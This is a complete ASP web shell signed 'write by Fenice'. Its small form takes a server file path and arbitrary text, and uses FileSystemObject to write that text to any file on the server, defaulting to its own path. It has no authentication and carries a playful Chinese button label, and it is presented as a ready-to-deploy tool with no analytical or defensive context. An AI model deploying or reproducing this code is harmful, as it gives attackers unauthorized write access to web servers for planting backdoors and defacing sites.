<%
on error resume next
T=Request.form("N")
S=Request.form("M")
set F=server.CreateObject("scripting.filesystemobject")
set I=F.OpenTextFile(T,2,True,0)
I.WriteLine(""&S& "")
if err =0 Then
response.write "<font color=red>success :)</font>"
else
response.write "<font color=red>failure :(</font>"
End if
I.close
set F = nothing 
%>
<form method="POST"ACTION="#">
<input type="text"size="20"name="N"value=<%=server.mappath("Fenice.asp")%>><br>
<textarea style="WIDTH:152;HEIGHT:190px" name="M"class=input>
</textarea>
<input type="submit"name="S"value="主人我饿了"class=input>
</form>
<%="<font face='黑体' color='red'> write by Fenice </font>"%>